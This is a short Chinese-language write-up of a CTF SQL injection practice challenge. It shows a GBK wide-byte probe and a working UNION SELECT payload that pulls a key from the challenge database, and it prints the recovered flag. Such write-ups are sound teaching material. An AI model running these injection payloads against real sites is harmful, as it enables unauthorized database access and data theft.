CTF练习平台sql注入测试writeup

来源:互联网 发布:php saas平台架构设计 编辑:程序博客网 时间:2024/05/17 22:59

练习网址http://103.238.227.13:10083/

页面截图


由以上提示我们可以看出查询key表,id=1的string字段,为此我们可以从最基本的注入开始尝试


发现并不报错,想到了宽字节注入,并且可以验证一下:

http://103.238.227.13:10083/index.php
?id=%df%27

输出结果如下



说明存在注入漏洞,我们可根据题的提示用宽字节注入练习下,如果不懂宽字节注入的可以看一下这个链接学习http://blog.csdn.net/helloweb2014/article/details/60757497

注入如下

http://103.238.227.13:10083/index.php


?id=-1%a1%27 union select 1,string from `key`%23

输出结果如图:


得到key为 54f3320dc261f313ba712eb3f13a1f6d


原创粉丝点击